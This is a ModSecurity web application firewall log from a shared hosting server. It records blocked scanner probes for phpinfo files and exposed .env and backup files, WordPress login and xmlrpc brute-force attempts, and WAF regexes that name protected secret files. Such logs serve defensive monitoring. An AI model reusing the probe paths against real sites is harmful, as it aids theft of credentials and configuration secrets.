[Tue May 26 18:27:14.579270 2026] [security2:error] [pid 998632:tid 998823] [client 85.11.167.49:63096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/info.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzMAAAAB8"]
[Tue May 26 18:27:14.714409 2026] [security2:error] [pid 998632:tid 998744] [remote 38.95.35.74:57576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzLwAASFg"]
[Tue May 26 18:27:14.836602 2026] [security2:error] [pid 998632:tid 998853] [client 85.11.167.49:63228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/php.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzNAAAADs"]
[Tue May 26 18:27:14.940584 2026] [security2:error] [pid 998632:tid 998756] [remote 38.95.35.74:57576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzNQAABmM"], referer: https://preetishah.moes-art.com/wp-login.php
[Tue May 26 18:27:14.951908 2026] [security2:error] [pid 998632:tid 998837] [client 20.48.248.215:42256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/x402.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzNgAAACs"]
[Tue May 26 18:27:14.952017 2026] [security2:error] [pid 998632:tid 998837] [client 20.48.248.215:42256] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/x402.php"] [unique_id "ahWYqq1OTU2dW0MS1EmzNgAAACs"]
[Tue May 26 18:27:15.099151 2026] [security2:error] [pid 998632:tid 998857] [client 85.11.167.49:63309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/php_info.php"] [unique_id "ahWYq61OTU2dW0MS1EmzPQAAAD8"]
[Tue May 26 18:27:15.362505 2026] [security2:error] [pid 998632:tid 998850] [client 85.11.167.49:63416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/i.php"] [unique_id "ahWYq61OTU2dW0MS1EmzPgAAADg"]
[Tue May 26 18:27:15.623707 2026] [security2:error] [pid 998632:tid 998868] [client 85.11.167.49:63492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/pi.php"] [unique_id "ahWYq61OTU2dW0MS1EmzSAAAAEo"]
[Tue May 26 18:27:16.048692 2026] [security2:error] [pid 998632:tid 998875] [client 85.11.167.49:63564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/admin/phpinfo.php"] [unique_id "ahWYrK1OTU2dW0MS1EmzVwAAAFA"]
[Tue May 26 18:27:16.303164 2026] [security2:error] [pid 998632:tid 998920] [client 85.11.167.49:63702] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/pinfo.php"] [unique_id "ahWYrK1OTU2dW0MS1EmzWgAAAHs"]
[Tue May 26 18:27:16.561733 2026] [security2:error] [pid 998632:tid 998840] [client 85.11.167.49:63778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/php_version.php"] [unique_id "ahWYrK1OTU2dW0MS1EmzYAAAAC4"]
[Tue May 26 18:27:16.970714 2026] [security2:error] [pid 998632:tid 998864] [client 85.11.167.49:63851] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahWYrK1OTU2dW0MS1EmzawAAAEY"]
[Tue May 26 18:27:17.495085 2026] [security2:error] [pid 998632:tid 998850] [client 85.11.167.49:63851] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/.env.backup"] [unique_id "ahWYra1OTU2dW0MS1EmzdQAAADg"]
[Tue May 26 18:27:17.625211 2026] [security2:error] [pid 998632:tid 998890] [client 85.11.167.49:63851] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/config/.env"] [unique_id "ahWYra1OTU2dW0MS1EmzeQAAAF0"]
[Tue May 26 18:27:18.735227 2026] [security2:error] [pid 998632:tid 998887] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYq61OTU2dW0MS1EmzPAAAAFo"]
[Tue May 26 18:27:19.083068 2026] [security2:error] [pid 998632:tid 998817] [client 124.43.5.103:59930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYr61OTU2dW0MS1EmzkAAAABo"]
[Tue May 26 18:27:19.083247 2026] [security2:error] [pid 998632:tid 998817] [client 124.43.5.103:59930] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYr61OTU2dW0MS1EmzkAAAABo"]
[Tue May 26 18:27:21.222887 2026] [security2:error] [pid 998632:tid 998878] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYra1OTU2dW0MS1EmzgwAAAFM"]
[Tue May 26 18:27:21.697847 2026] [security2:error] [pid 998632:tid 998800] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYr61OTU2dW0MS1EmzmQAAAAk"]
[Tue May 26 18:27:22.970273 2026] [security2:error] [pid 998632:tid 998767] [remote 178.104.90.233:51090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWYsq1OTU2dW0MS1Emz0AAAaGw"]
[Tue May 26 18:27:25.888465 2026] [security2:error] [pid 998632:tid 998870] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYs61OTU2dW0MS1Emz2QAAAEs"]
[Tue May 26 18:27:27.016153 2026] [security2:error] [pid 998632:tid 998781] [remote 54.37.118.77:54818] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWYt61OTU2dW0MS1Em0FQAAIno"]
[Tue May 26 18:27:27.016359 2026] [security2:error] [pid 998632:tid 998826] [client 54.37.118.77:54818] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWYt61OTU2dW0MS1Em0FQAAIno"]
[Tue May 26 18:27:27.379456 2026] [security2:error] [pid 998632:tid 998824] [client 173.239.254.114:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWYtK1OTU2dW0MS1Emz7gAAIHM"]
[Tue May 26 18:27:27.593745 2026] [security2:error] [pid 998632:tid 998671] [remote 94.76.235.103:41162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWYt61OTU2dW0MS1Em0HwAAHhI"]
[Tue May 26 18:27:28.575657 2026] [security2:error] [pid 998632:tid 998783] [remote 54.39.89.186:29304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWYuK1OTU2dW0MS1Em0NQAAJ3w"]
[Tue May 26 18:27:28.575829 2026] [security2:error] [pid 998632:tid 998832] [client 54.39.89.186:29304] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWYuK1OTU2dW0MS1Em0NQAAJ3w"]
[Tue May 26 18:27:28.824071 2026] [security2:error] [pid 998632:tid 998875] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYta1OTU2dW0MS1Em0CgAAAFA"]
[Tue May 26 18:27:29.803333 2026] [security2:error] [pid 998632:tid 998848] [client 124.43.5.103:43191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYua1OTU2dW0MS1Em0QwAAADY"]
[Tue May 26 18:27:29.803435 2026] [security2:error] [pid 998632:tid 998848] [client 124.43.5.103:43191] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYua1OTU2dW0MS1Em0QwAAADY"]
[Tue May 26 18:27:31.137177 2026] [security2:error] [pid 998632:tid 998854] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYuK1OTU2dW0MS1Em0MQAAADw"]
[Tue May 26 18:27:32.182820 2026] [security2:error] [pid 998632:tid 998877] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahWYvK1OTU2dW0MS1Em0nQAAAFI"]
[Tue May 26 18:27:34.275829 2026] [security2:error] [pid 998632:tid 998881] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYu61OTU2dW0MS1Em0jQAAAFY"]
[Tue May 26 18:27:36.558904 2026] [security2:error] [pid 998632:tid 998850] [client 146.174.183.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYva1OTU2dW0MS1Em0yQAAADg"]
[Tue May 26 18:27:37.280229 2026] [security2:error] [pid 998632:tid 998905] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYvq1OTU2dW0MS1Em02QAAAGw"]
[Tue May 26 18:27:40.346006 2026] [security2:error] [pid 998632:tid 998853] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYwa1OTU2dW0MS1Em1CQAAADs"]
[Tue May 26 18:27:40.784098 2026] [security2:error] [pid 998632:tid 998802] [client 124.43.5.103:1130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYxK1OTU2dW0MS1Em1SQAAAAs"]
[Tue May 26 18:27:40.784214 2026] [security2:error] [pid 998632:tid 998802] [client 124.43.5.103:1130] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYxK1OTU2dW0MS1Em1SQAAAAs"]
[Tue May 26 18:27:42.843000 2026] [security2:error] [pid 998632:tid 998884] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYw61OTU2dW0MS1Em1OQAAAFg"]
[Tue May 26 18:27:43.235589 2026] [security2:error] [pid 998632:tid 998774] [remote 103.11.102.106:46590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYx61OTU2dW0MS1Em1dwAAIHM"]
[Tue May 26 18:27:44.428266 2026] [security2:error] [pid 998632:tid 998657] [remote 162.241.152.21:49440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYyK1OTU2dW0MS1Em1iQAASQY"]
[Tue May 26 18:27:44.815181 2026] [security2:error] [pid 998632:tid 998829] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYxa1OTU2dW0MS1Em1XAAAACU"]
[Tue May 26 18:27:46.068842 2026] [security2:error] [pid 998632:tid 998665] [remote 162.241.152.21:49440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYyq1OTU2dW0MS1Em1oQAAOw0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:27:46.623361 2026] [security2:error] [pid 998632:tid 998858] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYyq1OTU2dW0MS1Em1tQAAAEA"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1203509&moderation-hash=30ff998383af377c781773c90331cda3
[Tue May 26 18:27:47.794703 2026] [security2:error] [pid 998632:tid 998807] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYyK1OTU2dW0MS1Em1kgAAABA"]
[Tue May 26 18:27:50.811759 2026] [security2:error] [pid 998632:tid 998833] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYzK1OTU2dW0MS1Em10QAAACg"]
[Tue May 26 18:27:51.219387 2026] [security2:error] [pid 998632:tid 998809] [client 124.43.5.103:1827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYz61OTU2dW0MS1Em2FgAAABI"]
[Tue May 26 18:27:51.219643 2026] [security2:error] [pid 998632:tid 998809] [client 124.43.5.103:1827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWYz61OTU2dW0MS1Em2FgAAABI"]
[Tue May 26 18:27:52.749011 2026] [security2:error] [pid 998632:tid 998696] [remote 113.190.40.93:53322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY0K1OTU2dW0MS1Em2KAAAaig"]
[Tue May 26 18:27:53.198789 2026] [security2:error] [pid 998632:tid 998711] [remote 18.209.220.99:53975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWY0K1OTU2dW0MS1Em2NQAAMDc"]
[Tue May 26 18:27:53.426241 2026] [security2:error] [pid 998632:tid 998687] [remote 18.209.220.99:53975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWY0a1OTU2dW0MS1Em2SQAAVB8"], referer: https://bosscoirs.com/wp-login.php
[Tue May 26 18:27:53.891558 2026] [security2:error] [pid 998632:tid 998799] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYzq1OTU2dW0MS1Em2EQAAAAg"]
[Tue May 26 18:27:54.115829 2026] [security2:error] [pid 998632:tid 998820] [client 8.231.144.84:58265] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shahvishaal.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWY0q1OTU2dW0MS1Em2UAAAABw"]
[Tue May 26 18:27:54.264040 2026] [security2:error] [pid 998632:tid 998922] [client 216.73.216.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWY0q1OTU2dW0MS1Em2UwAAAH0"]
[Tue May 26 18:27:54.568904 2026] [security2:error] [pid 998632:tid 998881] [client 8.231.144.84:53943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.144.231.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWY0q1OTU2dW0MS1Em2WAAAAFY"]
[Tue May 26 18:27:55.065638 2026] [security2:error] [pid 998632:tid 998852] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWY0K1OTU2dW0MS1Em2LgAAADo"]
[Tue May 26 18:27:57.149613 2026] [security2:error] [pid 998632:tid 998915] [client 216.73.216.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWY1a1OTU2dW0MS1Em2ngAAAHY"]
[Tue May 26 18:27:57.165473 2026] [security2:error] [pid 998632:tid 998743] [remote 74.7.241.58:51776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWY1a1OTU2dW0MS1Em2ogAAdFc"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:27:57.318539 2026] [security2:error] [pid 998632:tid 998845] [client 216.73.216.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWY1a1OTU2dW0MS1Em2pQAAADM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?moderation-hash=ca9a522d7454f9dc747861fe55392d52&unapproved=1204007
[Tue May 26 18:27:57.778546 2026] [security2:error] [pid 998632:tid 998729] [remote 160.250.186.220:49186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWY1a1OTU2dW0MS1Em2rAAAK0k"]
